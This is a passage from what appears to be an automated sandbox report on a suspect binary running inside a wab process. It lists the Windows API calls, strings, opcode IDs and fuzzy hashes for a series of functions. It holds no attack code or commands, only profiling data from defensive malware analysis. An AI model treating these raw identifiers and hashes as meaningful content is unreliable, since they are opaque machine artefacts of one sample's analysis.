                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                          • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$ChangeCloseCreateFindNotificationTime
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1631957507-0
                                                                                                                                                                                                                          • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                          • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1125800050-0
                                                                                                                                                                                                                          • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                                          • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                                                                          • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                                                                                          • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                          • String ID: BINARY
                                                                                                                                                                                                                          • API String ID: 2221118986-907554435
                                                                                                                                                                                                                          • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                                                          • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                                                                                                                                                                                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                            • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                                                                                            • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                                            • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1161345128-0
                                                                                                                                                                                                                          • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                                          • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                                                          • String ID: /stext
                                                                                                                                                                                                                          • API String ID: 2081463915-3817206916
                                                                                                                                                                                                                          • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                                          • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                                                          • String ID: .Sv
                                                                                                                                                                                                                          • API String ID: 2081463915-830255106
                                                                                                                                                                                                                          • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                                                          • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 159017214-0
                                                                                                                                                                                                                          • Opcode ID: ce19115a923a15add3814b7342b05fb50f984b43095f56e0ebc72410723b566f
                                                                                                                                                                                                                          • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce19115a923a15add3814b7342b05fb50f984b43095f56e0ebc72410723b566f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3150196962-0
                                                                                                                                                                                                                          • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                                                                                                          • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                                          • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                                                          • API String ID: 2803490479-1168259600
                                                                                                                                                                                                                          • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                                                          • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                          • Opcode ID: 3e003a951d4b795c2795be91072552c134f268f2eb67798ac8aad6e8ea3cca53
                                                                                                                                                                                                                          • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e003a951d4b795c2795be91072552c134f268f2eb67798ac8aad6e8ea3cca53
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                          • Opcode ID: 10fc877065b6e48d7bdc99d18b4a7e13807bbdb0444c9cb367cecc131ffa056e
                                                                                                                                                                                                                          • Instruction ID: 93a37c1a4f050773dc1a5674df64ec50811fc8a39a1cc3e4a9db11821b00e242
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10fc877065b6e48d7bdc99d18b4a7e13807bbdb0444c9cb367cecc131ffa056e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0B012310281004DEB057BA1B8061142302C64332E3B3413FE000500A3DE5D6034140F
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcmpmemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1065087418-0
                                                                                                                                                                                                                          • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                                          • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406E09
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406E5A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$??2@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3700833809-0
                                                                                                                                                                                                                          • Opcode ID: fbf9b295b5a7520f84bfa942b8c4279f7b3464a00728e86ce032f040724bd2e9
                                                                                                                                                                                                                          • Instruction ID: 3357a4f00022c45c5c3ded2ab4a10c96e173cb442a6a42c74f6c45d37007c03c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbf9b295b5a7520f84bfa942b8c4279f7b3464a00728e86ce032f040724bd2e9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE7117B1E00219EBCB04DFA9D8949EEB7B5FF08304F11802EF916A7281D7789951CB64
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2221118986-0
                                                                                                                                                                                                                          • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                                                                          • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1297977491-0
                                                                                                                                                                                                                          • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                                                                                          • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                            • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                            • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                            • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                          • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1481295809-0
                                                                                                                                                                                                                          • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                                          • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3150196962-0
                                                                                                                                                                                                                          • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                                                                                          • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$PointerRead
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3154509469-0
